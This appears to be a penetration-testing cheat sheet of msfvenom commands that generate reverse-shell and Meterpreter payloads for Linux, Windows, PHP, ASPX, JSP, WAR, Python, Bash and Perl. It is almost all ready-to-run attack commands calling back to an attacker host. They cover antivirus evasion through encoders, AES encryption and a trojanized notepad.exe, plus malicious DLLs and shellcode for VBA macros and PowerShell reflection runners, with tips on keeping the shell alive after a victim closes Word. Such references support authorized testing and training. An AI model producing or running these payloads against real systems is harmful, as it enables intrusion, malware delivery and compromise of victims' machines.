Msfvenom Payloads
msfvenom --list payloads
--> List available payloads
msfvenom --list encoders
--> List available encoders
msfvenom --list encrypt
--> List available encryptors
Linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -f elf -o reverse.elf
--> Creates a Meterpreter reverse TCP payload for Linux systems
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 prependfork=true -f elf -t 300 -e x64/xor_dynamic -o payload.elf
--> x64 Meterpreter ELF encoded with x64/xor_dynamic; prependfork=true runs the payload in a forked child process
msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST=attacker_ip LPORT=port -f elf-so -o file_name
--> Creates a malicious shared library object that establishes a remote shell to an attacker system.
Windows
msfvenom -p windows/x64/exec CMD=calc.exe -f c EXITFUNC=thread
--> Could be used to test C payloads (shellcode emitted as a C array)
msfvenom -p windows/x64/exec CMD=calc.exe -f raw EXITFUNC=thread -o payload.bin
--> Could be used to test raw shellcode implants
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/shikata_ga_nai -i 3 -a x86 -f exe > encoded.exe
--> Creates a Meterpreter reverse TCP payload for Windows systems, encoded with 3 iterations of x86/shikata_ga_nai
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.176.134 LPORT=443 -e x64/zutto_dekiru -x /home/kali/notepad.exe -f exe -o met64_notepad.exe
--> Meterpreter reverse HTTPS encoded with x64/zutto_dekiru and embedded in the notepad.exe template (-x)
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 --encrypt aes256 --encrypt-key fdgdgj93jf43uj983uf498f43 -f exe -o met64_aes.exe
--> Meterpreter reverse HTTPS with the shellcode AES-256 encrypted (--encrypt; see --list encrypt)
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.119.120 LPORT=443 -f csharp EXITFUNC=thread
--> Shellcode formatted for a C# project
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f raw -o shell.txt
--> Raw shellcode for SharpShooter
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f dll -o met.dll
--> Malicious DLL (DLL injection)
Shellcode for VBA Macros
To generate specific shellcode formatted as vbapplication with msfvenom (specify the EXITFUNC with a value of “thread” instead of the default value of “process” to avoid closing Microsoft Word when the shellcode exits):
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 EXITFUNC=thread -f vbapplication
To work as expected, this requires a matching 32-bit multi/handler in Metasploit with EXITFUNC set to “thread” and a matching IP and port number. The primary disadvantage is that when the victim closes Word, our shell dies, although Metasploit’s AutoMigrate module solves this.
To generate Powershell shellcode to insert in a VBA Macro:
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 EXITFUNC=thread -f ps1
With this version, our shell dies as soon as the parent PowerShell process terminates; it is essentially killed before it even starts. To solve this, we must instruct PowerShell to delay termination until our shell has fully executed, using the Win32 WaitForSingleObject API to pause the script and allow Meterpreter to finish.
To do so, we can embed this shellcode in a PowerShell script that runs it through the reflection technique (PowerShell Reflection Shellcode Runner).
PHP
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
Then we need to add the <?php tag on the first line of the file so that it executes as a PHP page (portable version of the prepend, no macOS pbcopy/pbpaste needed):
{ printf '<?php '; cat shell.php; } > shell_tagged.php && mv shell_tagged.php shell.php
ASPX
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f aspx -o /home/kali/met.aspx
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl